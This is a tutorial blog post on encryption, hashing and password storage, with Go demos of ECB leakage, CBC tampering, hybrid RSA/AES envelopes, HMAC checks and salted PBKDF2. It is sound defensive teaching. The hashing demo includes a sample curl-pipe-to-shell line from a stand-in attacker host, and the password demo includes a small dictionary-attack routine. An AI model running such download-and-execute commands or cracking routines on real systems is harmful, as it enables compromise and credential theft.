Published in Geek Culture

Encryption, Hashing, and Secure Software Development

Source (https://wallpaperaccess.com/cryptography)

If you build software without any concern for its security, it is like building your own house without locks on the doors and windows. So every software engineer needs a working knowledge of the ways we can secure our applications.

When it comes to secure software development, the field is broadly divided into two parts: Application Security and Software Security.

  • Application Security: defending against software exploits after deployment is complete.
  • Software Security: defending against software exploits by building the software to be secure in the first place (building security into the software).

Different strategies are used to find security problems during the software development process. Two of the basic ones are vulnerability testing and penetration testing. Vulnerability testing is the process of identifying and quantifying the vulnerabilities in an environment; in other words, it evaluates the security risks in a software system so that the probability of a threat succeeding can be reduced. Penetration testing simulates the actions of an external or internal attacker who aims to breach the security of the software. The consequences of a security breach include immediate financial loss, reputation loss, and lawsuits. Security attacks are categorized by their effect as leakage, tampering, resource stealing, vandalism, and denial of service.

  • Leakage: information leaving the system to someone not authorized to receive it.
  • Tampering: unauthorized alteration of information.
  • Resource stealing: unauthorized use of resources (CPU time, storage, bandwidth, accounts).
  • Vandalism: disturbing correct system operation.
  • Denial of service: disrupting legitimate use of the system.

The methods used to carry out these attacks are categorized as eavesdropping, masquerading, message tampering, replaying, and flooding. To build secure software we need to recognize each of them and know the remedy available for it;

  • Eavesdropping: obtaining copies of messages without authority. Remedy: encryption of data in transit.
  • Masquerading (spoofing): using the identity of another person or system without authority. Remedy: authentication, for example a digital signature or a MAC under a shared key.
  • Message tampering: intercepting and altering messages. Remedy: integrity protection (a MAC or a digital signature); encryption alone does not stop it.
  • Replaying: storing messages and sending them again later, so that a valid, authenticated request is executed twice. Remedy: nonces, timestamps or sequence numbers that the receiver checks.
  • Flooding: sending too many messages so that legitimate ones cannot be served. Remedy: rate limiting and capacity planning; cryptography does not help here.

What is Secure Software Engineering?

“Reliable software does what it is supposed to do. Secure software does that and nothing else” (Ivan Arce)

Cryptography

Security of data at rest and data in transit is one of the basic security requirements to consider when developing software. Cryptography is the art/science of secret writing. The goal is to keep information from those who are not supposed to see it by “scrambling” the original data with a well-known algorithm. A cryptographic algorithm takes two inputs, the data and a key, and the key is known only to authorized users. Encryption and hashing are the two main parts of cryptography covered here. Encryption is a two-way function: what is encrypted can be decrypted with the proper key. That means when we encrypt (scramble) data using an encryption algorithm and a key, we can decrypt (unscramble) it again with the proper key. Hashing is a one-way function that turns input of any length into a fixed-size message digest or hash code; there is no key and no way back, so when we hash (scramble) data it is not reversible. A good hash function also makes it infeasible to find two different inputs with the same digest.

Kerckhoffs’s Principle

•A cryptosystem should be secure even if everything about the system, except the key, is public knowledge. (This is the opposite of security through obscurity: assume the attacker knows your algorithm, and put all of the secrecy into the key.)

•A famous example: Enigma in WWII. The Allies knew how the machine worked and had captured copies of it; what they had to recover was the daily key settings, and weaknesses in how those settings were chosen and used let British codebreakers break the encryption of the war messages of Nazi Germany (if you have watched the movie The Imitation Game (2014) you know what I’m talking about… 😁😁)

1. Encryption

Figure 1: The process of Encryption and Decryption

Encryption and decryption algorithms (E, D) are widely known and are used together with keys to convert plaintext to ciphertext and ciphertext back to plaintext respectively. Keys (KE, KD) may be symmetric or asymmetric in nature. The ciphertext is the only information that we assume an attacker can see. The plaintext is known only by the people with the keys (in an ideal world… 😁). The plaintext is the message before encryption and the ciphertext is the message after encryption. The key is the information needed to convert from plaintext to ciphertext (and vice versa). Apart from that, confusion and diffusion are two key properties of a good encryption system.

  • Confusion: each bit of the ciphertext depends on several parts of the key, which hides the relation between key and ciphertext.
  • Diffusion: changing a single bit of the plaintext changes about half of the ciphertext bits, which hides the relation between plaintext and ciphertext.

In the above paragraph I mentioned that keys can be symmetric or asymmetric, which gives the two types of encryption: symmetric key encryption and asymmetric key encryption.

1). Symmetric Key Encryption: This is a type of encryption where only one key (a secret key) is used for both encryption and decryption. The entities communicating via symmetric encryption must first share that key, so that it can be used in the decryption process. Some of the names you will meet are block ciphers, and others are modes of operation that describe how a block cipher is applied to data longer than one block;

  • Data Encryption Standard (DES): a block cipher with a 56-bit key; obsolete, since the key can be brute-forced.
  • Electronic Code Book (ECB): a mode, not a cipher. Each block is encrypted independently, so identical plaintext blocks give identical ciphertext blocks and the ciphertext leaks patterns. Do not use it.
  • Cipher Block Chaining (CBC): a mode. Each plaintext block is XORed with the previous ciphertext block (or a random IV) before encryption, so repeated plaintext no longer shows. It provides no integrity on its own.
  • Advanced Encryption Standard (AES): the current standard block cipher (128-, 192- or 256-bit keys), normally used in an authenticated mode such as AES-GCM.

The main advantage of symmetric key encryption is that it is fast, since it uses one key and cheap operations. The drawbacks are key management and distribution (every pair of parties needs its own shared secret, delivered over some secure channel) and that it guarantees only confidentiality: unless a MAC or an authenticated mode is used, a modified ciphertext is not detected.

Figure 2: Symmetric Key Encryption Process
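The difference between ECB and CBC, and the limit of what either mode gives you, as an added example in Go (this is not code from the original article). The key, IV and the repeating sample plaintext are constructed for the demo, and the ECB routine is written by hand because Go's standard library deliberately does not ship an ECB mode:

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
)

// ecbEncrypt runs the block cipher over each block independently. Go ships no
// ECB mode on purpose; this is what it would be. The plaintext must already be
// a multiple of the block size (no padding is applied in this demo).
func ecbEncrypt(block cipher.Block, plaintext []byte) []byte {
	bs := block.BlockSize()
	if len(plaintext)%bs != 0 {
		panic("ecbEncrypt: plaintext is not a multiple of the block size")
	}
	out := make([]byte, len(plaintext))
	for i := 0; i < len(plaintext); i += bs {
		block.Encrypt(out[i:i+bs], plaintext[i:i+bs])
	}
	return out
}

// cbcEncrypt chains the blocks: each plaintext block is XORed with the
// previous ciphertext block (or the IV for the first block) before encryption.
func cbcEncrypt(block cipher.Block, iv, plaintext []byte) []byte {
	out := make([]byte, len(plaintext))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(out, plaintext)
	return out
}

func cbcDecrypt(block cipher.Block, iv, ciphertext []byte) []byte {
	out := make([]byte, len(ciphertext))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(out, ciphertext)
	return out
}

// repeatedBlocks counts ciphertext blocks identical to an earlier block.
// Anything above zero means the ciphertext leaks plaintext structure.
func repeatedBlocks(ciphertext []byte, bs int) int {
	seen := make(map[string]bool)
	repeats := 0
	for i := 0; i+bs <= len(ciphertext); i += bs {
		blk := string(ciphertext[i : i+bs])
		if seen[blk] {
			repeats++
		}
		seen[blk] = true
	}
	return repeats
}

func main() {
	key := make([]byte, 16) // AES-128 key, generated at random for the demo
	iv := make([]byte, aes.BlockSize)
	if _, err := rand.Read(key); err != nil {
		panic(err)
	}
	if _, err := rand.Read(iv); err != nil {
		panic(err)
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		panic(err)
	}
	// Constructed sample: four identical 16-byte blocks.
	plaintext := bytes.Repeat([]byte("ATTACK AT DAWN!!"), 4)
	ecb := ecbEncrypt(block, plaintext)
	cbc := cbcEncrypt(block, iv, plaintext)
	n := len(plaintext) / aes.BlockSize
	fmt.Printf("ECB: %d of %d blocks repeat an earlier block\n", repeatedBlocks(ecb, aes.BlockSize), n)
	fmt.Printf("CBC: %d of %d blocks repeat an earlier block\n", repeatedBlocks(cbc, aes.BlockSize), n)
	// Neither mode detects tampering. Flipping one bit of ciphertext block 0
	// scrambles plaintext block 0 and flips the same bit in plaintext block 1.
	tampered := append([]byte(nil), cbc...)
	tampered[0] ^= 0x01
	fmt.Printf("CBC decryption after a one-bit flip: %q\n", cbcDecrypt(block, iv, tampered))
}
```

Under ECB the four identical input blocks produce four identical output blocks, so an observer learns that the message repeats itself even without the key (the well-known "ECB penguin" is the same effect on an image). CBC removes the repetition, but the bit-flip at the end shows why the text says symmetric encryption guarantees only confidentiality: the receiver gets a modified plaintext and nothing tells it that anything happened. An authenticated mode (AES-GCM) or a separate MAC is what closes that gap.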

2). Asymmetric Key Encryption: This is a type of encryption that uses two separate, yet mathematically related keys to encrypt and decrypt data. The public key encrypts data while its corresponding private key decrypts it. The public key is available to everybody, and the private key is kept secret. Deriving the private key from the public key is computationally hard. The general process of asymmetric key encryption;

  • The recipient generates a pair of keys (public and private) and publishes the public key through a trusted service, such as a certificate authority or a key server.
  • The sender obtains the recipient's public key, uses it to encrypt the message, then sends the ciphertext to the recipient.
  • The recipient decrypts the message using the private key that only the recipient holds. To reply, the recipient encrypts with the sender's public key and the sender decrypts with his or her own private key.
  • An eavesdropper who captures the messages cannot read them, because decryption requires the private key. With a modern padding scheme such as RSA-OAEP a captured ciphertext also cannot be changed into a different meaningful message; in practice integrity and sender authentication are added explicitly with a digital signature, since encryption alone does not prove who sent the message.

The main advantage of asymmetric encryption is that it removes the key distribution problem: the public key can be sent over an open channel, and only its authenticity (that it really belongs to the recipient) needs protecting, which is what certificates are for. The disadvantage is that it is far slower than symmetric encryption and can only encrypt short inputs, so it is normally used to protect small values such as session keys and hashes. Some of the asymmetric (public key) algorithms are;

  • RSA Algorithm (encryption and digital signatures)
  • Diffie Hellman Algorithm (key agreement: two parties derive a shared symmetric key over a public channel)
  • Elliptic Curve Diffie Hellman (ECDH) Algorithm (the same idea over elliptic curves, with much shorter keys)
  • Digital Signature Algorithm (DSA, and its elliptic curve form ECDSA: signatures only, not encryption)

Figure 3: Asymmetric Key Encryption Process

PGP (Pretty Good Privacy) is used for encrypting email messages and for digital signatures. It combines symmetric and asymmetric encryption;

** Symmetric encryption is fast but has a key distribution problem

** Asymmetric encryption is slower, but has no key distribution problem

Therefore, as a solution, it uses asymmetric encryption to encrypt and distribute a random session key, and symmetric encryption under that session key for the message itself. This combination is called hybrid encryption, and TLS and most other secure protocols work the same way.
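The hybrid scheme described above, covering the asymmetric process listed earlier and the symmetric-plus-asymmetric combination that PGP uses, as an added Go example rather than code from the article or from PGP itself: RSA-OAEP wraps a random AES-256 session key, AES-GCM encrypts the message, and an RSA-PSS signature from the sender covers the whole envelope, which is what gives authentication and non-repudiation. The Envelope type, the function names and the sample message are assumptions made for this demo; replay protection (a nonce or sequence number the receiver tracks) is deliberately left out.

```go
package main

import (
	"bytes"
	"crypto"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Envelope is the hypothetical wire format of this demo: the AES session key
// wrapped with the recipient's RSA public key, the GCM nonce, the ciphertext,
// and the sender's RSA-PSS signature over those three fields.
type Envelope struct {
	WrappedKey, Nonce, Ciphertext, Signature []byte
}

// signedBytes is what the signature covers (WrappedKey and Nonce have fixed
// lengths for a given key size and cipher, so the plain join is unambiguous).
func (e *Envelope) signedBytes() []byte {
	return bytes.Join([][]byte{e.WrappedKey, e.Nonce, e.Ciphertext}, nil)
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// sealEnvelope encrypts plaintext for recipientPub and signs it with senderPriv.
func sealEnvelope(senderPriv *rsa.PrivateKey, recipientPub *rsa.PublicKey, plaintext []byte) (*Envelope, error) {
	// 1. Symmetric part: fresh random 256-bit session key, AES-GCM (fast, and
	//    the GCM tag authenticates the ciphertext, so tampering is detected).
	sessionKey := make([]byte, 32)
	if _, err := rand.Read(sessionKey); err != nil {
		return nil, err
	}
	gcm, err := newGCM(sessionKey)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	env := &Envelope{Nonce: nonce, Ciphertext: gcm.Seal(nil, nonce, plaintext, nil)}
	// 2. Asymmetric part: only the 32-byte session key goes through RSA-OAEP
	//    under the recipient's public key, so no secret is shared in advance.
	env.WrappedKey, err = rsa.EncryptOAEP(sha256.New(), rand.Reader, recipientPub, sessionKey, nil)
	if err != nil {
		return nil, err
	}
	// 3. Signature under the sender's private key: proves who sent it
	//    (authentication) and the sender cannot deny it later (non-repudiation).
	digest := sha256.Sum256(env.signedBytes())
	env.Signature, err = rsa.SignPSS(rand.Reader, senderPriv, crypto.SHA256, digest[:], nil)
	return env, err
}

// openEnvelope verifies the signature against senderPub, unwraps the session key
// with recipientPriv and decrypts; any modification fails one of the two checks.
func openEnvelope(recipientPriv *rsa.PrivateKey, senderPub *rsa.PublicKey, env *Envelope) ([]byte, error) {
	digest := sha256.Sum256(env.signedBytes())
	if err := rsa.VerifyPSS(senderPub, crypto.SHA256, digest[:], env.Signature, nil); err != nil {
		return nil, errors.New("signature invalid: not from the claimed sender, or altered in transit")
	}
	sessionKey, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, recipientPriv, env.WrappedKey, nil)
	if err != nil {
		return nil, err
	}
	gcm, err := newGCM(sessionKey)
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, env.Nonce, env.Ciphertext, nil)
}

func mustKey() *rsa.PrivateKey {
	k, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		panic(err)
	}
	return k
}

func main() {
	alice, bob := mustKey(), mustKey() // sender and recipient
	env, err := sealEnvelope(alice, &bob.PublicKey, []byte("meet at the usual place, 21:00"))
	if err != nil {
		panic(err)
	}
	msg, err := openEnvelope(bob, &alice.PublicKey, env)
	fmt.Printf("bob reads %q (err=%v)\n", msg, err)
	env.Ciphertext[0] ^= 0x01 // message tampering: one flipped bit is caught
	_, err = openEnvelope(bob, &alice.PublicKey, env)
	fmt.Println("tampered envelope:", err)
}
```

The expensive RSA operations touch only 32 bytes of key material and one 32-byte digest, however long the message is; everything else is AES. Note the order in openEnvelope: the signature is checked before any private-key decryption is attempted, so an envelope from an impostor (signed with a key other than Alice's) or one modified in transit is rejected without the recipient doing any work on it.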

2. Hashing

Hashing is the process of consuming the input in fixed-size blocks and iteratively updating the internal state (128 bits, 160 bits, 256 bits, etc.) of the hashing algorithm; after the last block has been processed, that internal state is output as the message digest or hash code. A hash function generates the scrambled value according to a well-defined mathematical algorithm, and the result is known as a hash code or sometimes a message digest. A good hash function is one-way: the hash value cannot be converted back into the original value (preimage resistance). It also makes it infeasible to find two different inputs with the same hash (collision resistance), and it has the avalanche property: if you change one character in a stream of characters, the hash value will be completely different from the previous one. There are several hashing algorithms, but some of them are outdated now;

  • MD5 (size of hash code: 128 bits; broken, collisions can be produced in seconds, do not use it for security)
  • SHA-1 (size of hash code: 160 bits; broken, practical collisions have been demonstrated, being phased out)
  • SHA-256 (size of hash code: 256 bits; part of the SHA-2 family, the current recommendation)
  • SHA-512 (size of hash code: 512 bits; part of the SHA-2 family)
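How a digest behaves, and why a bare hash is not an integrity check against an attacker, as an added Go example that is not part of the original article. The sample "file" contents, the attacker's replacement and the shared key are all constructed for the demo:

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"fmt"
	"math/bits"
)

// digest returns the SHA-256 message digest of data: 32 bytes whatever the input length.
func digest(data []byte) []byte {
	sum := sha256.Sum256(data)
	return sum[:]
}

// differingBits counts the bits that differ between two equal-length digests.
// For a good hash a one-bit change in the input flips about half of them.
func differingBits(a, b []byte) int {
	n := 0
	for i := range a {
		n += bits.OnesCount8(a[i] ^ b[i])
	}
	return n
}

// verifyDownload is the check a client performs on a file published together
// with its hash. hmac.Equal is a constant-time comparison.
func verifyDownload(file, publishedHash []byte) bool {
	return hmac.Equal(digest(file), publishedHash)
}

// attackerSwap models an attacker who controls the channel carrying both the
// file and its hash: they replace the file and simply publish a new hash.
func attackerSwap(newFile []byte) (file, hash []byte) {
	return newFile, digest(newFile)
}

// tag is an HMAC-SHA256 over the file under a key the attacker does not have;
// verifyTag checks it. Producing a valid tag for a new file now needs the key.
func tag(key, file []byte) []byte {
	m := hmac.New(sha256.New, key)
	m.Write(file)
	return m.Sum(nil)
}

func verifyTag(key, file, t []byte) bool {
	return hmac.Equal(tag(key, file), t)
}

func main() {
	// Constructed sample: a tiny "installer" and a one-bit corrupted copy of it.
	original := []byte("install.sh v1.0: curl https://example.invalid/pkg.tgz | tar xz")
	flipped := append([]byte(nil), original...)
	flipped[0] ^= 0x01
	fmt.Printf("one input bit changed -> %d of 256 digest bits changed\n",
		differingBits(digest(original), digest(flipped)))

	// Hash-only integrity detects accidental corruption...
	fmt.Println("corrupted copy passes hash check:", verifyDownload(flipped, digest(original)))
	// ...but not a deliberate swap, because the attacker recomputes the hash too.
	evilFile, evilHash := attackerSwap([]byte("install.sh v1.0: curl https://attacker.invalid/x | sh"))
	fmt.Println("swapped file passes hash check:", verifyDownload(evilFile, evilHash))

	// A keyed hash (or a digital signature) is what gives integrity against an attacker.
	key := []byte("key-shared-by-publisher-and-client") // constructed for the demo
	fmt.Println("original passes HMAC check:", verifyTag(key, original, tag(key, original)))
	fmt.Println("swapped file with attacker-made tag passes:", verifyTag(key, evilFile, tag([]byte("guess"), evilFile)))
}
```

The first line of output shows the avalanche effect from the paragraph above. The hash-only section is the practical caveat: a checksum on the same web page as the download protects against a corrupted transfer, not against whoever can edit that page. A MAC under a key the attacker lacks, or a signature under the publisher's private key, is needed for that.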

Some applications of hashing are password protection, blockchain design, and protecting the integrity of software packages and digital certificates. When we talk about password protection, the idea is to store the hash of the password rather than the password itself, so that if a data leak happens it is difficult for the attacker to recover the original password from the hash, because of the one-way nature of the hash function. But if we store just the plain hash of the password it is susceptible to rainbow table attacks and dictionary attacks.

  • Rainbow Table Attacks: a precomputed table for reversing cryptographic hash functions, usually for cracking passwords. It works because, without a salt, the same password always produces the same hash.
  • Dictionary Attacks: attempting to find the original plain text by hashing common passwords and comparing them to the target value.

We can defeat these attacks by using Salt and Pepper with the hashing functions. Both are random bytes combined with the password before hashing (typically as a prefix or as the key of an HMAC, not at random positions). A salt is generated freshly for every password and stored next to the hash in the database; it makes precomputed tables useless and ensures that two users with the same password get different hashes. A pepper is a single secret shared by the whole application and is not stored in the database (it lives in configuration, a key vault or an HSM), so a stolen database table alone is not enough to run a dictionary attack. Neither stops an attacker who has both the salt and the pepper from guessing one weak password, which is why password hashes should also use a deliberately slow function such as bcrypt, scrypt, Argon2 or PBKDF2 rather than a single SHA-256.
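Salt and pepper in practice, as an added Go example that is not part of the original article. The leaked-password list, the pepper value and the Record layout are constructed for the demo, and the PBKDF2 routine is written out by hand only so that the block has no dependency outside the standard library; a real system would use a maintained library (bcrypt, scrypt or Argon2) instead of this routine.

```go
package main

import (
	"crypto/hmac"
	"crypto/rand"
	"crypto/sha256"
	"fmt"
)

// naiveHash is the scheme the text warns about: an unsalted SHA-256 of the
// password. Every user with the same password gets the same hash.
func naiveHash(password string) []byte {
	h := sha256.Sum256([]byte(password))
	return h[:]
}

// pbkdf2SHA256 is a minimal PBKDF2 (RFC 8018) with HMAC-SHA256 as the PRF,
// written out here for self-containment. Use a maintained library in production.
func pbkdf2SHA256(password, salt []byte, iterations, keyLen int) []byte {
	prf := hmac.New(sha256.New, password)
	var out []byte
	for blk := 1; len(out) < keyLen; blk++ {
		prf.Reset()
		prf.Write(salt)
		prf.Write([]byte{byte(blk >> 24), byte(blk >> 16), byte(blk >> 8), byte(blk)})
		u := prf.Sum(nil)
		t := append([]byte(nil), u...)
		for i := 1; i < iterations; i++ {
			prf.Reset()
			prf.Write(u)
			u = prf.Sum(nil)
			for j := range t {
				t[j] ^= u[j]
			}
		}
		out = append(out, t...)
	}
	return out[:keyLen]
}

// Record is what the database stores per user. The salt is public and sits
// beside the hash; the pepper is deliberately NOT part of the record.
type Record struct {
	Salt       []byte
	Iterations int
	Hash       []byte
}

// hashPassword derives a slow, salted key from the password and then applies
// the pepper as an HMAC key, so hash + salt alone are useless without the pepper.
func hashPassword(password string, salt, pepper []byte, iterations int) []byte {
	derived := pbkdf2SHA256([]byte(password), salt, iterations, 32)
	m := hmac.New(sha256.New, pepper)
	m.Write(derived)
	return m.Sum(nil)
}

// newRecord creates a Record with a fresh random 16-byte salt.
func newRecord(password string, pepper []byte, iterations int) (Record, error) {
	salt := make([]byte, 16)
	if _, err := rand.Read(salt); err != nil {
		return Record{}, err
	}
	return Record{Salt: salt, Iterations: iterations, Hash: hashPassword(password, salt, pepper, iterations)}, nil
}

// verifyPassword recomputes the hash and compares it in constant time.
func verifyPassword(rec Record, password string, pepper []byte) bool {
	return hmac.Equal(rec.Hash, hashPassword(password, rec.Salt, pepper, rec.Iterations))
}

// dictionaryAttack hashes every candidate with hashFn, the scheme the attacker
// believes is in use (Kerckhoffs: the algorithm is not the secret), and reports
// the first candidate whose hash equals target.
func dictionaryAttack(target []byte, candidates []string, hashFn func(string) []byte) (string, bool) {
	for _, c := range candidates {
		if hmac.Equal(hashFn(c), target) {
			return c, true
		}
	}
	return "", false
}

func main() {
	// Constructed sample: a small "leaked passwords" dictionary and a pepper.
	leaked := []string{"123456", "password", "qwerty", "letmein", "password123"}
	pepper := []byte("pepper-from-config-not-db")

	// 1. Unsalted SHA-256: the dictionary attack succeeds immediately.
	found, ok := dictionaryAttack(naiveHash("password123"), leaked, naiveHash)
	fmt.Printf("unsalted: cracked=%v password=%q\n", ok, found)

	// 2. Salted + peppered: the attacker holds the DB row (hash and salt) but
	//    not the pepper, so even the correct guess does not match.
	rec, _ := newRecord("password123", pepper, 100000)
	_, ok = dictionaryAttack(rec.Hash, leaked, func(p string) []byte {
		return pbkdf2SHA256([]byte(p), rec.Salt, rec.Iterations, 32)
	})
	fmt.Printf("salted+peppered, attacker without pepper: cracked=%v\n", ok)
	fmt.Println("login with the correct password:", verifyPassword(rec, "password123", pepper))
}
```

Two details matter beyond what the paragraph says. First, the comparison in verifyPassword and dictionaryAttack uses hmac.Equal, a constant-time compare, so an attacker cannot learn how many leading bytes of a guess were right from the response time. Second, the iteration count is stored in the record; that lets you raise it for new passwords as hardware gets faster without invalidating existing hashes.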

So modern cryptography is mainly concerned with the following objectives;

  1. Confidentiality: the information cannot be understood by anyone for whom it was not intended.
  2. Integrity: the data cannot be altered in storage or in transit between sender and receiver without the alteration being detected.
  3. Non-Repudiation: the creator/sender of the information cannot deny at a later stage having created or sent it.
  4. Authentication: the sender and receiver can confirm each other’s identity and the origin/destination of the information.

Therefore, symmetric key encryption gives us confidentiality. Asymmetric key encryption, together with digital signatures, gives us authentication and non-repudiation as well as confidentiality. Hashing gives us integrity, with one caveat: a bare hash only detects accidental corruption, because an attacker who can change the data can recompute the hash as well. Integrity against an active attacker needs a keyed hash (an HMAC under a shared secret) or a digital signature over the hash.


Ranmal Dewage

Software Engineer at Sysco Labs, Graduate of Sri Lanka Institute of Information Technology (SLIIT).
